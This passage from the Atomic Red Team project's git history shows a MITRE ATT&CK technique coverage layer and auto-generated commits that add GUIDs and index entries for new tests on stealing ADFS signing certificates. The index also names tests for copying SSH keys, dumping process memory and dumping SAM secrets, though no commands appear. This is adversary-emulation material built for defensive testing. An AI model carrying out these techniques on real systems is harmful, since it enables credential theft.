":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T
1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"},{"techniqueID":"T1219","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"},{"techniqueID":"T1220","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"},{"techniqueID":"T1221","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"},{"techniqueID":"T1222.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1482","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1489","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"},{"techniqueID":"T1490","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"},{"techniqueID":"T1491.001","score":100,"enabled":tr
ue,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1491","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1505.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1531","score":100,"enabled":true,"comment":"https
://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"},{"techniqueID":"T1543.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1546.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546.003","score":100,"enabled":true,"commen
t":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546","score":100,"enabled"
:true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546.013","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546.014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1547.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547.006","sco
re":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID"
:"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1550.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{
"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1555.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001
/T1555.001.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"},{"techniqueID":"T1556.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1556","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1558.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"},{"techniqueID":"T1559.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T155
9.002/T1559.002.md"},{"techniqueID":"T1559","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics
/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"},{"techniqueID":"T1563.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1563","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/m
aster/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"},{"techniqueID":"T1566.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1566","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1569.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1572","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"},{"techniqueID":"T1573","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"},{"techniqueID":"T1574.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001
/T1574.001.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1610","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1
610.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]} \ No newline at end of file From c7ff36af56e45423e304864718dc6282d8db2de5 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Thu, 19 Aug 2021 15:03:43 +0000 Subject: [PATCH 30/39] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/used_guids.txt | 2 ++ 1 file changed, 2 insertions(+) diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index a8291305..b3f3a3cb 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -764,3 +764,5 @@ eeb9751a-d598-42d3-b11c-c122d9c3f6c7 aa6cb8c4-b582-4f8e-b677-37733914abda 9c10dc6b-20bd-403a-8e67-50ef7d07ed4e 615bd568-2859-41b5-9aed-61f6a88e48dd +78e95057-d429-4e66-8f82-0f060c1ac96f +cab413d8-9e4a-4b8d-9b84-c985bd73a442 From f72d8699bf6c963c29b0ec961d6dc76ea3a9f9a1 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 19 Aug 2021 15:03:48 +0000 Subject: [PATCH 31/39] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 2 + atomics/Indexes/Indexes-CSV/windows-index.csv | 2 + atomics/Indexes/Indexes-Markdown/index.md | 2 + .../Indexes/Indexes-Markdown/windows-index.md | 2 + atomics/Indexes/index.yaml | 93 ++++++++++++ atomics/T1552.004/T1552.004.md | 137 ++++++++++++++++++ 6 files changed, 238 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 85b3626e..fd3686a6 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv 
@@ -71,6 +71,8 @@ credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-90 credential-access,T1552.004,Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh credential-access,T1552.004,Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh credential-access,T1552.004,Private Keys,5,Copy the users GnuPG directory with rsync,2a5a0601-f5fb-4e2e-aa09-73282ae6afca,sh +credential-access,T1552.004,Private Keys,6,ADFS token signing and encryption certificates theft - Local,78e95057-d429-4e66-8f82-0f060c1ac96f,powershell +credential-access,T1552.004,Private Keys,7,ADFS token signing and encryption certificates theft - Remote,cab413d8-9e4a-4b8d-9b84-c985bd73a442,powershell credential-access,T1003.007,Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh credential-access,T1003.007,Proc Filesystem,2,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 50d5465f..c02a3d0f 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
